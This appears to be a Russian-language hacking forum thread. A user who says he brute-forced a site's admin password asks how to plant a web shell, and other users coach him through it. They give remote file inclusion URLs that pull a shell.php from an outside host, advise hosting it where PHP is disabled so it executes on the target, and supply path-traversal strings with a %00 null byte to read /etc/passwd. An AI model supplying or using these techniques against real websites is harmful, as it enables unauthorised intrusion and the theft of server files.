Подскажите как залить шел:
Подобрал пароль к админке. Там есть приблизительно такой вызов скрипта:
http://www.hacksite.com/index.php?id?page=user024.php

Я сделал так:
http://www.hacksite.com/index.php?id&page=http://www.site.com/shell.php

Как теперь сделать чтобы у меня был доступ к файлам атакуемого сервера? А то я вижу только свой сервер, свои файлы?

Я сделал так:
http://www.hacksite.com/index.php?id&page=http://www.site.com/shell.php

если так не получилось может быть это локальный инклюд... попробуй залить шелл и потом его про инклюдить...

xXvladXx бред, читай что тс написал

Nicca на каком хосте находится твой шелл.. это раз, второе - не в фрейме опенится ссыль?

если так не получилось может быть это локальный инклюд... попробуй залить шелл и потом его про инклюдить...
чел, ты хоть сам понял что написал? если ты зальёшь шелл, нахрена его потом инклудить?

xXvladXx бред, читай что тс написал

Nicca на каком хосте находится твой шелл.. это раз, второе - не в фрейме опенится ссыль?

1. .freehostia.com

2.Опенится во фрейме!

чел, ты хоть сам понял что написал? если ты зальёшь шелл шелл, нахрена его потом инклудить?

если ты зальешь шелл просто как файл /*без права на исполнение: картинка, видео, текст.. а потом локально инклюдить*/

но у тс скорее всего просто ифрейм.. /*судя по тому, что он видит файлы того сервера, где залит шелл*/
тс, попробуй проинклюдить /еtc/passwd или что-то другое не доступное через ифрейм

*добавлено

если ифрем, то это не инклуд))) ищи другие баги или попробуй через заливку /*картинок, банеров, темплейтов и других фалов*/, попробуй редактирование страниц, тепмлейтов

если во фрейме, то ничего не поделаешь. скорее всего просто открывается

<frame src="http://shell.com/shell.php">

Как исккать /еtc/passwd?
к UsrPage= Добавлять ../etc/passwd ?
Как я тогда его увижу? Сдесь не выводятся\ сообщения об ошибках пробовал:
UsrPage= .sfsd.f2r2 выводит страницу по дефолту. Ошибки нет.
Если я наткнусь на /etc/passwd то выведит ли мне его на страницу?

Что вы вообще такое говрите))? У меня была ткая же фигня..твой хость скорее всего поодерживает php, поэтому и не выполняется...нужен хост, где нету php...например: www.nm.ru
А что бы читать содержимое надо сделать так)):
http://www.hacksite.com/index.php?id&page=../etc/passwd
И потом побольше ../ не бойся с ними переборжить...этоне страшно..то ест запрос будет выглядеть так:
http://www.hacksite.com/index.php?id&page=../../../../../../../../../../../../../../../etc/passwd
Если есть ошибка и там написано например: ошибка иинкюда ../../../../../../../../../../../../../../../etc/passwd.php
То надо просто после passwd поставить %00
То есть вот так http://www.hacksite.com/index.php?id&page=../../../../../../../../../../../../../../../etc/passwd
Если написана просто ошибка, то возможно надо больше ../
А если и это не поможт, значит инклюд невозможен

да вожможно у него там даже нет ни какого инклуда попробуй подставить ковычку после http://www.hacksite.com/index.php?id&page=' и посмотри что у тебя получится

Не факт что во там именно ифрейм
http://freehostia.com/free_hosting.html
Смотрим сюда и видим PHP Enabled
Это значит что шелл выполняется на blabla.freehostia.com и уже выводится на уязвимом сайте
ТС, залей шелл на хостинг без PHP (narod.ru к примеру) и пробуй его проинклудить

ТС, залей шелл на хостинг без PHP (narod.ru к примеру) и пробуй его проинклудить

Что вы вообще такое говрите))? У меня была такая же фигня..твой хость скорее всего поодерживает php, поэтому и не выполняется...нужен хост, где нету php...например: www.nm.ru

Я уже это писал))

И вообще...аввтар ссылку давай...или скажи получилось или нет?